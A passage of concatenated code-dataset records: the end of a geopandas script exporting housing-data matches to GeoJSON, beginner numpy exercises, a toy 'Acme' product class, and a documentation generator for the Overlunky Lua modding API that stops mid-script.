df_results['score'+str(i)] > seuil\n df_results.loc[:, 'seuil'+str(i)] = condition_colonne\n condition_colonne = condition_colonne + colonne_inter\n\n df_results = pd.concat([df_results,df_bnb], ignore_index=False, sort=False, axis=1)\n df_results.loc[:, 'seuil_total'] = condition_colonne\n print(df_results.shape)\n# df_results = df_results.loc[df_results.seuil_total] \n# print(df_results.shape)\n\n # On identifie et stocke les id_rpls pour lesquels le score est supérieur au seuil\n id_sup_seuil = []\n for i in range(250):\n id_sup_seuil.append(\n df_results.loc[\n df_results.loc[:,'seuil{}'.format(i)]\n ,'id_rpls{}'.format(i)\n ].reindex(index=range(df_results.shape[0])))\n \n df_results = df_results.loc[:,['latitude','longitude']]\n \n # On crée une colonne 'id_bnb' pour que l'id_bnb apparaisse dans les properties du geojson\n df_results['id_bnb']=df_results.index\n\n for i in range(250):\n df_results = pd.concat([df_results,id_sup_seuil[i]], ignore_index=False\n , sort=False, axis=1)\n\n df_results = df_results.loc[df_results.isna().sum(axis=1) != 250]\n print(df_results.head())\n print(df_results.shape)\n \n gdf = gpd.GeoDataFrame(df_results, geometry=gpd.points_from_xy(df_results.longitude, df_results.latitude))\n gdf.drop(columns=['longitude','latitude'], inplace=True)\n\n gdf.to_file(\"static/donneesgeos/croisementBis3.geojson\", driver='GeoJSON')\n\n#------------------------------------------------------------------------------#\n#---------------------------- Création coord_rpls -----------------------------#\n#------------------------------------------------------------------------------#\n\"\"\"\ndf = pd.read_csv('paris_rpls_2017.csv', sep=',', header='infer',\n usecols=['longitude','latitude'])\n\ndf.to_json('static/donneesgeos/coord_rpls.json')\n\"\"\"","sub_path":"po_oresys/backend_manipulation/csv_to_geojson.py","file_name":"csv_to_geojson.py","file_ext":"py","file_size_in_byte":4287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248717217","text":"# %%\r\n# Find the largest integer less than or equal to x1/x2 where x1 = all integers 1-10 & x2 =1.3:\r\nimport numpy as np\r\n\r\nx1_array = [1,2,3,4,5,6,7,8,9,10]\r\ndiv_array = np.divide(x1_array, 1.3)\r\ndiv_array\r\n\r\n\r\n# %%\r\n#Step 1: set x1\r\n## Different approach: x1 = np.arange(1,11)\r\nx1 = np.array(range(1,11)) \r\n\r\n# Step 2: set x2\r\nx2 = 1.3\r\n\r\n# Step 3\r\nx3 = x1//x2\r\nnp.max(x3)\r\n\r\n# np.floor(x1/x2)\r\n## np.max(x3)\r\n# %%\r\n# Conditional Statement demonstration:\r\nhunger = 2.9\r\n\r\nif 8 <= hunger <= 10:\r\n print(\"Eat a meal!\")\r\nelif 3 <= hunger < 8:\r\n print(\"Eat a snack!\")\r\nelse:\r\n print(\"Remember to hydrate.\")\r\n\r\n# For Loop demonstration:\r\nhunger_list = [1,6,3,7,8,4,2,9,10]\r\n\r\nfor i in hunger_list:\r\n if 8 <= i <= 10:\r\n print(\"Eat a meal!\")\r\n elif 3 <= i < 8:\r\n print(\"Eat a snack!\")\r\n else:\r\n print(\"Remember to hydrate.\")\r\n\r\n# List comprehension \r\nhunger_list = [1,6,3,7,8,4,2,9,10]\r\n\r\nnew_hunger_list = [i for i in hunger_list if i >= 3]\r\n\r\nprint(np.round(np.mean(new_hunger_list), 2))\r\n\r\n\r\n# %%\r\n","sub_path":"Notes/23.09.py","file_name":"23.09.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"344622","text":"\"\"\"\nThis is the file containing the class Acme\n\"\"\"\nfrom random import randint\n\n\nclass Product():\n def __init__(\n self,\n name,\n price=10,\n weight=20,\n flammibility=0.5,\n identifier=randint(1000000, 9999999)\n ):\n\n self.name = name\n self.price = price\n self.weight = weight\n self.flammibility = flammibility\n self.identifier = identifier\n\n def stealability(self):\n val_stealish = self.price / self.weight\n if val_stealish < 0.5:\n return print('Not so stealable.')\n elif val_stealish >= 0.5 and val_stealish < 1.0:\n return print('Kinda stealable...')\n else:\n return print('Very Stealable!!')\n\n def explode(self):\n exp_factor = self.flammibility * self.weight\n if exp_factor < 10:\n return print('...fizzle')\n elif exp_factor >= 10 and exp_factor < 50:\n return print('...boom!')\n else:\n return print('..BABOOM!!!')\n\n\nclass BoxingGlove(Product):\n def __init__(\n self,\n name,\n price=10,\n weight=10,\n flamibility=0.5,\n identifier=randint(1000000, 9999999)\n ):\n\n self.name = name\n self.price = price\n self.weight = weight\n self.flammibility = flamibility\n self.identifier = identifier\n\n def explode(self):\n return print(\"... It's a glove.\")\n\n def punch(self):\n if self.weight < 5:\n return print('That tickles.')\n elif self.weight >= 5 and self.weight < 15:\n return print('Hey, that hurt!')\n else:\n return print(\"OUCH!!\")\n","sub_path":"SC/acme.py","file_name":"acme.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"113312795","text":"import re\n\n# redirect stdout to script-api.md\nimport sys\n\nsys.stdout = open(\"script-api.md\", \"w\")\n\nheader_files = [\n \"../src/game_api/math.hpp\",\n \"../src/game_api/rpc.hpp\",\n \"../src/game_api/spawn_api.hpp\",\n \"../src/game_api/script.hpp\",\n \"../src/game_api/color.hpp\",\n \"../src/game_api/entity.hpp\",\n \"../src/game_api/movable.hpp\",\n \"../src/game_api/game_manager.hpp\",\n \"../src/game_api/state.hpp\",\n \"../src/game_api/state_structs.hpp\",\n \"../src/game_api/prng.hpp\",\n \"../src/game_api/entities_floors.hpp\",\n \"../src/game_api/entities_activefloors.hpp\",\n \"../src/game_api/entities_mounts.hpp\",\n \"../src/game_api/entities_monsters.hpp\",\n \"../src/game_api/entities_chars.hpp\",\n \"../src/game_api/entities_items.hpp\",\n \"../src/game_api/entities_fx.hpp\",\n \"../src/game_api/entities_liquids.hpp\",\n \"../src/game_api/sound_manager.hpp\",\n \"../src/game_api/render_api.hpp\",\n \"../src/game_api/particles.hpp\",\n \"../src/game_api/savedata.hpp\",\n \"../src/game_api/level_api.hpp\",\n \"../src/game_api/level_api_types.hpp\",\n \"../src/game_api/items.hpp\",\n \"../src/game_api/screen.hpp\",\n \"../src/game_api/screen_arena.hpp\",\n \"../src/game_api/online.hpp\",\n \"../src/game_api/script/usertypes/level_lua.hpp\",\n \"../src/game_api/script/usertypes/gui_lua.hpp\",\n \"../src/game_api/script/usertypes/vanilla_render_lua.hpp\",\n \"../src/game_api/script/usertypes/save_context.hpp\",\n \"../src/game_api/script/usertypes/hitbox_lua.hpp\",\n]\napi_files = [\n \"../src/game_api/script/script_impl.cpp\",\n \"../src/game_api/script/script_impl.hpp\",\n \"../src/game_api/script/lua_vm.cpp\",\n \"../src/game_api/script/lua_vm.hpp\",\n \"../src/game_api/script/lua_backend.cpp\",\n \"../src/game_api/script/lua_backend.hpp\",\n \"../src/game_api/script/usertypes/save_context.cpp\",\n \"../src/game_api/script/usertypes/state_lua.cpp\",\n \"../src/game_api/script/usertypes/prng_lua.cpp\",\n \"../src/game_api/script/usertypes/entity_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_chars_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_floors_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_activefloors_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_mounts_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_monsters_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_items_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_fx_lua.cpp\",\n \"../src/game_api/script/usertypes/entities_liquids_lua.cpp\",\n \"../src/game_api/script/usertypes/particles_lua.cpp\",\n \"../src/game_api/script/usertypes/level_lua.cpp\",\n \"../src/game_api/script/usertypes/sound_lua.cpp\",\n \"../src/game_api/script/usertypes/player_lua.cpp\",\n \"../src/game_api/script/usertypes/gui_lua.cpp\",\n \"../src/game_api/script/usertypes/gui_lua.hpp\",\n \"../src/game_api/script/usertypes/vanilla_render_lua.cpp\",\n \"../src/game_api/script/usertypes/vanilla_render_lua.hpp\",\n \"../src/game_api/script/usertypes/drops_lua.cpp\",\n \"../src/game_api/script/usertypes/texture_lua.cpp\",\n \"../src/game_api/script/usertypes/flags_lua.cpp\",\n \"../src/game_api/script/usertypes/char_state_lua.cpp\",\n \"../src/game_api/script/usertypes/hitbox_lua.cpp\",\n \"../src/game_api/script/usertypes/screen_lua.cpp\",\n \"../src/game_api/script/usertypes/screen_arena_lua.cpp\",\n]\nrpc = []\nclasses = []\nevents = []\nfuncs = []\ntypes = []\nknown_casts = []\naliases = []\nlualibs = []\nenums = []\nreplace = {\n \"uint8_t\": \"int\",\n \"uint16_t\": \"int\",\n \"uint32_t\": \"int\",\n \"uint64_t\": \"int\",\n \"int8_t\": \"int\",\n \"int16_t\": \"int\",\n \"int32_t\": \"int\",\n \"int64_t\": \"int\",\n \"ImU32\": \"int\",\n \"vector\": \"array\",\n \"unordered_map\": \"map\",\n \"const char*\": \"string\",\n \"wstring\": \"string\",\n \"u16string\": \"string\",\n \"pair\": \"tuple\",\n \"std::\": \"\",\n \"sol::\": \"\",\n \"void\": \"\",\n \"constexpr\": \"\",\n \"static\": \"\",\n \"variadic_args va\": \"int, int...\",\n}\ncomment = []\nnot_functions = [\n \"players\",\n \"state\",\n \"game_manager\",\n \"online\",\n \"savegame\",\n \"options\",\n \"meta\",\n \"prng\",\n]\nskip = False\n\n\ndef getfunc(name):\n for func in funcs:\n if func[\"name\"] == name:\n return func\n return False\n\n\ndef rpcfunc(name):\n ret = []\n for func in rpc:\n if func[\"name\"] == name:\n ret.append(func)\n return ret\n\n\ndef replace_all(text, dic):\n for i, j in dic.items():\n pos = text.find(i)\n br2 = text.find('`', pos + len(i))\n br1 = text.rfind('`', 0, pos)\n if pos > 0 and br1 >= 0 and br2 > 0:\n continue\n text = text.replace(i, j)\n return text\n\n\ndef print_af(lf, af):\n if lf[\"comment\"] and lf[\"comment\"][0] == \"NoDoc\":\n return\n ret = replace_all(af[\"return\"], replace) or \"nil\"\n name = lf[\"name\"]\n param = replace_all(af[\"param\"], replace)\n fun = f\"{ret} {name}({param})\".strip()\n search_link = \"https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\" + name\n print(f\"### [`{name}`]({search_link})\")\n print(f\"`{fun}`
\")\n for com in lf[\"comment\"]:\n print(com)\n\n\nfor file in header_files:\n comment = []\n data = open(file, \"r\").read().split(\"\\n\")\n skip = 0\n for line in data:\n line = line.replace(\"*\", \"\")\n skip += line.count(\"{\") - line.count(\"}\")\n c = re.search(r\"/// ?(.*)$\", line)\n if c:\n comment.append(c.group(1))\n m = re.search(r\"\\s*(.*)\\s+([^\\(]*)\\(([^\\)]*)\", line)\n if m:\n if skip == 0 or file.endswith(\"script.hpp\"):\n rpc.append(\n {\n \"return\": m.group(1),\n \"name\": m.group(2),\n \"param\": m.group(3),\n \"comment\": comment,\n }\n )\n else:\n comment = []\n\nfor file in header_files:\n if file.endswith(\"script.hpp\"):\n continue\n data = open(file, \"r\").read().split(\"\\n\")\n brackets_depth = 0\n in_union = False\n in_anonymous_struct = False\n class_name = None\n comment = []\n member_funs = {}\n member_vars = []\n for line in data:\n line = replace_all(line, replace)\n line = line.replace(\"*\", \"\")\n if not class_name and (\"struct\" in line or \"class\" in line):\n m = re.match(r\"(struct|class)\\s+(\\S+)\", line)\n if m:\n class_name = m[2]\n elif class_name:\n prev_brackets_depth = brackets_depth\n brackets_depth += line.count(\"{\") - line.count(\"}\")\n\n if brackets_depth == 1:\n if line.strip() == \"union\":\n in_union = True\n if brackets_depth == 2 and in_union:\n if line.strip() == \"struct\":\n in_anonymous_struct = True\n\n if brackets_depth < prev_brackets_depth:\n if brackets_depth == 2:\n in_anonymous_struct = False\n if brackets_depth == 1:\n in_union = False\n\n if (\n brackets_depth == 1\n or (brackets_depth == 2 and in_union)\n or (brackets_depth == 3 and in_anonymous_struct)\n ):\n m = re.search(r\"/// ?(.*)$\", line)\n if m:\n comment.append(m[1])\n else:\n m = re.search(\n r\"^\\s*:.*$\", line\n ) # skip lines that start with a colon (constructor parameter initialization)\n if m:\n continue\n\n m = re.search(r\"\\s*(virtual\\s)?(.*)\\s+([^\\(]*)\\(([^\\)]*)\", line)\n if m:\n name = m[3]\n # move ctor is useless for Lua\n is_move_ctr = re.fullmatch(fr\"\\s*{name}\\s*&&[^,]*\", m[4]) and not m[2]\n if not is_move_ctr:\n if name not in member_funs:\n member_funs[name] = []\n member_funs[name].append(\n {\n \"return\": m[2],\n \"name\": m[3],\n \"param\": m[4],\n \"comment\": comment,\n }\n )\n comment = []\n\n m = re.search(\n r\"\\s*([^\\;\\{]*)\\s+([^\\;^\\{}]*)\\s*(\\{[^\\}]*\\})?\\;\", line\n )\n if m:\n member_vars.append(\n {\"type\": m[1], \"name\": m[2], \"comment\": comment}\n )\n comment = []\n elif brackets_depth == 0:\n classes.append(\n {\n \"name\": class_name,\n \"member_funs\": member_funs,\n \"member_vars\": member_vars,\n }\n )\n class_name = None\n comment = []\n member_funs = {}\n member_vars = []\n\nfor file in api_files:\n comment = []\n data = open(file, \"r\").read().split(\"\\n\")\n for line in data:\n line = line.replace(\"*\", \"\")\n m = re.search(r'lua\\[[\\'\"]([^\\'\"]*)[\\'\"]\\];', line)\n if m:\n events.append({\"name\": m.group(1), \"comment\": comment})\n else:\n comment = []\n c = re.search(r\"/// ?(.*)$\", line)\n if c:\n comment.append(c.group(1))\n else:\n comment = []\n\nfor file in api_files:\n comment = []\n data = open(file, \"r\").read().split(\"\\n\")\n for line in data:\n line = line.replace(\"*\", \"\")\n a = re.search(r'lua\\[[\\'\"]([^\\'\"]*)[\\'\"]\\]\\s+=\\s+(.*);', line)\n b = re.search(r'lua\\[[\\'\"]([^\\'\"]*)[\\'\"]\\]\\s+=\\s+(.*)$', line)\n if a and not a.group(1).startswith(\"__\"):\n if not getfunc(a.group(1)):\n funcs.append(\n {\"name\": a.group(1), \"cpp\": a.group(2), \"comment\": comment}\n )\n comment = []\n elif b and not b.group(1).startswith(\"__\"):\n if not getfunc(b.group(1)):\n funcs.append(\n {\"name\": b.group(1), \"cpp\": b.group(2), \"comment\": comment}\n )\n comment = []\n c = re.search(r\"/// ?(.*)$\", line)\n if c:\n comment.append(c.group(1))\n\nfor file in api_files:\n data = open(file, \"r\").read()\n data = data.replace(\"\\n\", \"\")\n data = re.sub(r\" \", \"\", data)\n m = re.findall(r'new_usertype\\<([^\\>]*?)\\>\\s*\\(\\s*\"([^\"]*)\",(.*?)\\);', data)\n for type in m:\n cpp_type = type[0]\n name = type[1]\n attr = type[2]\n base = \"\"\n bm = re.search(r\"sol::bases<([^\\]]*)>\", attr)\n if bm:\n base = bm.group(1)\n attr = attr.replace('\",', \",\")\n attr = attr.split('\"')\n vars = []\n\n underlying_cpp_type = next(\n (item for item in classes if item[\"name\"] == cpp_type), dict()\n )\n if \"member_funs\" not in underlying_cpp_type:\n raise RuntimeError(\n \"No member_funs found. Did you forget to include a header file at the top of the generate script?\"\n )\n\n for var in attr:\n if not var:\n continue\n var = var.split(\",\")\n if var[0] == \"sol::base_classes\" or var[0] == \"sol::no_constructor\":\n continue\n if \"table_of\" in var[1]:\n var[1] = var[1].replace(\"table_of(\", \"\") + \"[]\"\n if var[1].startswith(\"sol::readonly\"):\n var[1] = var[1].replace(\"sol::readonly(\", \"\")\n var[1] = var[1][:-1]\n if var[1].startswith(\"std::move\"):\n var[1] = var[1].replace(\"std::move(\", \"\")\n var[1] = var[1][:-1]\n\n var_name = var[0]\n cpp = var[1]\n cpp_name = cpp[cpp.find(\"::\") + 2 :] if cpp.find(\"::\") >= 0 else cpp\n\n if var[0].startswith(\"sol::constructors\"):\n for fun in underlying_cpp_type[\"member_funs\"][cpp_type]:\n param = fun[\"param\"]\n sig = f\"{cpp_type}({param})\"\n vars.append(\n {\n \"name\": cpp_type,\n \"type\": \"\",\n \"signature\": sig,\n \"comment\": fun[\"comment\"],\n }\n )\n elif cpp_name in underlying_cpp_type[\"member_funs\"]:\n for fun in underlying_cpp_type[\"member_funs\"][cpp_name]:\n ret = fun[\"return\"]\n param = fun[\"param\"]\n sig = f\"{ret} {var_name}({param})\"\n vars.append(\n {\n \"name\": var_name,\n \"type\": cpp,\n \"signature\": sig,\n \"comment\": fun[\"comment\"],\n }\n )\n else:\n underlying_cpp_var = next(\n (\n item\n for item in underlying_cpp_type[\"member_vars\"]\n if item[\"name\"] == cpp_name\n ),\n dict(),\n )\n if underlying_cpp_var:\n type = underlying_cpp_var[\"type\"]\n sig = f\"{type} {var_name}\"\n vars.append(\n {\n \"name\": var_name,\n \"type\": cpp,\n \"signature\": sig,\n \"comment\": underlying_cpp_var[\"comment\"],\n }\n )\n else:\n vars.append({\"name\": var_name, \"type\": cpp})\n types.append({\"name\": name, \"vars\": vars, \"base\": base})\n\nfor file in api_files:\n with open(file) as fp:\n line = fp.readline()\n while line:\n m = re.search(r'lua\\[\"Entity\"\\]\\[\"(as_.*)\"\\]', line)\n if m != None:\n known_casts.append(m.group(1))\n line = fp.readline()\nknown_casts.sort()\n\nfor file in api_files:\n comment = []\n data = open(file, \"r\").read().split(\"\\n\")\n for line in data:\n line = line.replace(\"*\", \"\")\n m = re.findall(r\"new_usertype\\<(.*?)\\>\", line)\n if m:\n type = m[0]\n type_to_mod = next((item for item in types if item[\"name\"] == type), dict())\n if type_to_mod:\n type_to_mod[\"comment\"] = comment\n comment = []\n if line == \"\":\n comment = []\n c = re.search(r\"/// ?(.*)$\", line)\n if c:\n comment.append(c.group(1))\n\nfor file in api_files:\n data = open(file, \"r\").read()\n data = data.replace(\"\\n\", \"\")\n data = re.sub(r\" \", \"\", data)\n m = re.findall(r'create_named_table\\s*\\(\\s*\"([^\"]*)\"\\/\\/,([^\\)]*)', data)\n for type in m:\n name = type[0]\n attr = type[1]\n attr = attr.replace(\"//\", \"\")\n attr = attr.replace('\",', \",\")\n attr = attr.split('\"')\n vars = []\n for var in attr:\n if not var:\n continue\n var = var.split(\",\")\n var[1] = var[1].replace(\"__\", \" \")\n var[1] = var[1].replace(\"\\\\[\", \"(\")\n var[1] = var[1].replace(\"\\\\]\", \")\")\n vars.append({\"name\": var[0], \"type\": var[1]})\n enums.append({\"name\": name, \"vars\": vars})\n\nfor file in api_files:\n data = open(file, \"r\").read()\n data = data.replace(\"\\n\", \"\")\n data = re.sub(r\" \", \"\", data)\n m = re.findall(r'create_named_table\\s*\\(\\s*\"([^\"]*)\",([^\\)]*)', data)\n for type in m:\n name = type[0]\n attr = type[1]\n attr = attr.replace('\",', \",\")\n attr = attr.split('\"')\n vars = []\n for var in attr:\n if not var:\n continue\n var = var.split(\",\")\n vars.append({\"name\": var[0], \"type\": var[1]})\n enums.append({\"name\": name, \"vars\": vars})\n data = open(file, \"r\").read()\n data = data.replace(\"\\n\", \" \")\n m = re.findall(r\"/\\*(.*?)\\*/\", data)\n for extended_enum_info in m:\n extended_enum_info = extended_enum_info.strip()\n enum = extended_enum_info[: extended_enum_info.find(\" \")]\n enum_to_mod = next((item for item in enums if item[\"name\"] == enum), dict())\n current_var_to_mod = dict()\n if enum_to_mod:\n sub_matches = re.findall(r\"\\/\\/\\s*([^\\/\\/]+)\", extended_enum_info.strip())\n collected_docs = \"\"\n for sub_match in sub_matches:\n var_name = sub_match.strip()\n var_to_mod = next(\n (item for item in enum_to_mod[\"vars\"] if item[\"name\"] == var_name),\n dict(),\n )\n if var_to_mod:\n if current_var_to_mod:\n current_var_to_mod[\"docs\"] = collected_docs\n current_var_to_mod = var_to_mod\n collected_docs = \"\"\n else:\n collected_docs += \"\\\\\\n\" + var_name\n if current_var_to_mod:\n current_var_to_mod[\"docs\"] = collected_docs\n\nfor file in api_files:\n comment = []\n name_next = False\n data = open(file, \"r\").read().split(\"\\n\")\n for line in data:\n line_clean = line.replace(\" \", \"\")\n a = re.findall(r'create_named_table\\s*\\(\\s*\"([^\"]*)\"\\/\\/,([^\\)]*)', line_clean)\n b = re.findall(r'create_named_table\\s*\\(\\s*\"([^\"]*)\",([^\\)]*)', line_clean)\n c = re.findall(r'create_named_table\\s*\\(\\s*\"([^\"]*)\"\\)', line_clean)\n m = a or b or ([c] if c else [])\n if m or name_next:\n enum = m[0][0] if m else line.strip('\", ')\n enum_to_mod = next((item for item in enums if item[\"name\"] == enum), dict())\n if enum_to_mod:\n enum_to_mod[\"comment\"] = comment\n comment = []\n name_next = False\n elif \"create_named_table\" in line:\n name_next = True\n else:\n name_next = False\n if line == \"\":\n comment = []\n c = re.search(r\"/// ?(.*)$\", line)\n if c:\n comment.append(c.group(1))\n\nfor file in api_files:\n data = open(file, \"r\").read()\n data = data.replace(\"\\n\", \"\")\n data = re.sub(r\" \", \"\", data)\n m = re.search(r\"open_libraries\\s*\\(([^\\)]*)\\)\", data)\n if m:\n libs = m.group(1).split(\",\")\n for lib in libs:\n lualibs.append(lib.replace(\"sol::lib::\", \"\"))\n\ndata = open(\"../src/game_api/aliases.hpp\", \"r\").read().split(\"\\n\")\nfor line in data:\n if not line.endswith(\"NoAlias\"):\n m = re.search(r\"using\\s*(\\S*)\\s*=\\s*(\\S*)\", line)\n if m:\n name = m.group(1)\n type = replace_all(m.group(2), replace)\n aliases.append({\"name\": name, \"type\": type})\n\nprint(\"# Overlunky Lua API\")\nprint(\n \"- Everything here is still changing, don't be sad if your scripts break next week!\"\n)\nprint(\n \"- This doc doesn't have a lot of examples, that's why we have [examples/](https://github.com/spelunky-fyi/overlunky/tree/main/examples).\"\n)\nprint(\n \"- This doc and the examples are written for a person who already knows [how to program in Lua](http://lua-users.org/wiki/TutorialDirectory).\"\n)\nprint(\n \"- This doc is up to date for the [WHIP build](https://github.com/spelunky-fyi/overlunky/releases/tag/whip). If you're using an official release from the past, you might find some things here don't work.\"\n)\nprint(\n \"- You can find changes to and earlier versions of this doc [here](https://github.com/spelunky-fyi/overlunky/commits/main/docs/script-api.md).\"\n)\nprint(\n \"- Click on the names of things to search for examples on how to use that function or variable.\"\n)\n\nprint(\"## Lua libraries\")\nprint(\n \"The following Lua libraries and their functions are available. You can read more about them in the [Lua documentation](https://www.lua.org/manual/5.4/manual.html#6).\"\n)\nfor lib in lualibs:\n print(\"### `\" + lib + \"`\")\nprint(\"### `json`\")\nprint(\n \"\"\"To save data in your mod it makes a lot of sense to use `json` to encode a table into a string and decode strings to table. For example this code that saves table and loads it back:\n```Lua\nlocal some_mod_data_that_should_be_saved = {{\n kills = 0,\n unlocked = false\n}}\nset_callback(function(save_ctx)\n local save_data_str = json.encode(some_mod_data_that_should_be_saved)\n save_ctx:save(save_data_str)\nend, ON.SAVE)\n\nset_callback(function(load_ctx)\n local load_data_str = load_ctx:load()\n if load_data_str ~= \"\" then\n some_mod_data_that_should_be_saved = json.decode(load_data_str)\n end\nend, ON.LOAD)\n```\"\"\"\n)\nprint(\"### `inspect`\")\nprint(\n \"\"\"This module is a great substitute for `tostring` because it can convert any type to a string and thus helps a lot with debugging. Use for example like this:\n```Lua\nlocal look_ma_no_tostring = {\n number = 15,\n nested_table = {\n array = {\n 1,\n 2,\n 4\n }\n }\n}\nmessage(inspect(look_ma_no_tostring))\n--[[prints:\n{\n number = 15,\n nested_table = {\n array = { 1, 2, 4 }\n }\n}\n]]\n```\"\"\"\n)\nprint(\"### `format`\")\nprint(\n \"\"\"This allows you to make strings without having to do a lot of `tostring` and `..` by placing your variables directly inside of the string. Use `F` in front of your string and wrap variables you want to print in `{}`, for example like this:\n```Lua\nfor _, player in players do\n local royal_title = nil\n if player:is_female() then\n royal_title = 'Queen'\n else\n royal_title = 'King'\n end\n local name = F'{player:get_name()} aka {royal_title} {player:get_short_name()}'\n message(name)\nend\n```\"\"\"\n)\n\nprint(\"## Unsafe mode\")\nprint(\n \"Setting `meta.unsafe = true` enables the rest of the standard Lua libraries like `io` and `os`, loading dlls with require and `package.loadlib`. Using unsafe scripts requires users to enable the option in the overlunky.ini file which is found in the Spelunky 2 installation directory.\"\n)\n\nprint(\"## Modules\")\nprint(\n \"\"\"You can load modules with `require \"mymod\"` or `require \"mydir.mymod\"`, just put `mymod.lua` in the same directory the script is, or in `mydir/` to keep things organized.\n\nCheck the [Lua tutorial](http://lua-users.org/wiki/ModulesTutorial) or examples how to actually make modules.\"\"\"\n)\n\nprint(\"## Global variables\")\nprint(\"\"\"These variables are always there to use.\"\"\")\nfor lf in funcs:\n if lf[\"name\"] in not_functions:\n print(\n \"### [`\"\n + lf[\"name\"]\n + \"`](https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\"\n + lf[\"name\"]\n + \")\"\n )\n for com in lf[\"comment\"]:\n print(com)\n\ndeprecated_funcs = [\n func for func in funcs if func[\"comment\"] and func[\"comment\"][0] == \"Deprecated\"\n]\nfuncs = [\n func\n for func in funcs\n if not func[\"comment\"] or not func[\"comment\"][0] == \"Deprecated\"\n]\n\nprint(\"## Functions\")\nprint(\n \"Note: The game functions like `spawn` use [level coordinates](#get_position). Draw functions use normalized [screen coordinates](#screen_position) from `-1.0 .. 1.0` where `0.0, 0.0` is the center of the screen.\"\n)\nfor lf in funcs:\n if len(rpcfunc(lf[\"cpp\"])):\n for af in rpcfunc(lf[\"cpp\"]):\n print_af(lf, af)\n elif not (lf[\"name\"].startswith(\"on_\") or lf[\"name\"] in not_functions):\n if lf[\"comment\"] and lf[\"comment\"][0] == \"NoDoc\":\n continue\n m = re.search(r\"\\(([^\\{]*)\\)\\s*->\\s*([^\\{]*)\", lf[\"cpp\"])\n m2 = re.search(r\"\\(([^\\{]*)\\)\", lf[\"cpp\"])\n ret = \"nil\"\n param = \"\"\n if m:\n ret = replace_all(m.group(2), replace).strip() or \"nil\"\n if m or m2:\n param = (m or m2).group(1)\n param = replace_all(param, replace).strip()\n name = lf[\"name\"]\n fun = f\"{ret} {name}({param})\".strip()\n search_link = \"https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\" + name\n print(f\"### [`{name}`]({search_link})\")\n print(f\"`{fun}`
\")\n for com in lf[\"comment\"]:\n print(com)\n\n\nprint(\"## Deprecated Functions\")\nprint(\n \"#### These functions still exist but their usage is discouraged, they all have alternatives mentioned here so please use those!\"\n)\n\nfor lf in events:\n if lf[\"name\"].startswith(\"on_\"):\n print(\n \"### [`\"\n + lf[\"name\"]\n + \"`](https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\"\n + lf[\"name\"]\n + \")\"\n )\n for com in lf[\"comment\"]:\n print(com)\n\nfor lf in deprecated_funcs:\n lf[\"comment\"].pop(0)\n if len(rpcfunc(lf[\"cpp\"])):\n for af in rpcfunc(lf[\"cpp\"]):\n print_af(lf, af)\n elif not (lf[\"name\"].startswith(\"on_\") or lf[\"name\"] in not_functions):\n if lf[\"comment\"] and lf[\"comment\"][0] == \"NoDoc\":\n continue\n m = re.search(r\"\\(([^\\{]*)\\)\\s*->\\s*([^\\{]*)\", lf[\"cpp\"])\n m2 = re.search(r\"\\(([^\\{]*)\\)\", lf[\"cpp\"])\n ret = \"nil\"\n param = \"\"\n if m:\n ret = replace_all(m.group(2), replace).strip() or \"nil\"\n if m or m2:\n param = (m or m2).group(1)\n param = replace_all(param, replace).strip()\n name = lf[\"name\"]\n fun = f\"{ret} {name}({param})\".strip()\n search_link = \"https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\" + name\n print(f\"### [`{name}`]({search_link})\")\n print(f\"`{fun}`
\")\n for com in lf[\"comment\"]:\n print(com)\n\nprint(\"## Types\")\nprint(\n \"Using the api through these directly is kinda dangerous, but such is life. I got pretty bored writing this doc generator at this point, so you can find the variable types in the [source files](https://github.com/spelunky-fyi/overlunky/tree/main/src/game_api). They're mostly just ints and floats. Example:\"\n)\nprint(\n \"\"\"```lua\n-- This doesn't make any sense, as you could just access the variables directly from players[]\n-- It's just a weird example OK!\nids = get_entities_by_mask(MASK.PLAYER) -- This just covers CHARs\nfor i,id in ipairs(ids) do\n e = get_entity(id):as_player() -- cast Entity to Player to access inventory\n e.health = 99\n e.inventory.bombs = 99\n e.inventory.ropes = 99\n e.type.jump = 0.36\nend\n```\"\"\"\n)\nfor type in types:\n print(\"### `\" + type[\"name\"] + \"`\")\n if \"comment\" in type:\n for com in type[\"comment\"]:\n print(com)\n if type[\"base\"]:\n print(\"Derived from\", end=\"\")\n bases = type[\"base\"].split(\",\")\n for base in bases:\n print(\" [`\" + base + \"`](#\" + base.lower() + \")\", end=\"\")\n print()\n for var in type[\"vars\"]:\n search_link = (\n \"https://github.com/spelunky-fyi/overlunky/search?l=Lua&q=\" + var[\"name\"]\n )\n if \"signature\" in var:\n signature = var[\"signature\"]\n m = re.search(r\"\\s*(.*)\\s+([^\\(]*)\\(([^\\)]*)\", var[\"signature\"])\n if m:\n ret = replace_all(m.group(1), replace) or \"nil\"\n name = m.group(2)\n param = replace_all(m.group(3), replace)\n signature = ret + \" \" + name + \"(\" + param + \")\"\n signature = signature.strip()\n type_str = var[\"type\"].replace(\"<\", \"<\").replace(\">\", \">\")\n print(f\"- [`{signature}`]({search_link}) {type_str}\")\n else:\n name = var[\"name\"]\n type_str = var[\"type\"].replace(\"<\", \"<\").replace(\">\", \">\")\n print(f\"- [`{name}`]({search_link}) {type_str}\")\n if \"comment\" in var and var[\"comment\"]:\n print(\"\\\\\")\n for com in var[\"comment\"]:\n print(com)\n\nprint(\"## Automatic casting of entities\")\nprint(\n \"When using `get_entity()` the returned entity will automatically be of the correct type. It is not necessary to use the `as_` functions.\"\n)\nprint(\"\")\nprint(\n \"To figure out what type of entity you get back, consult the [entity hierarchy list](entities-hierarchy.md)\"\n)\nprint(\"\")\nprint(\"For reference, the available `as_` functions are listed below:\")\nfor known_cast in known_casts:\n print(\"- \" + known_cast)\n\nprint(\"## 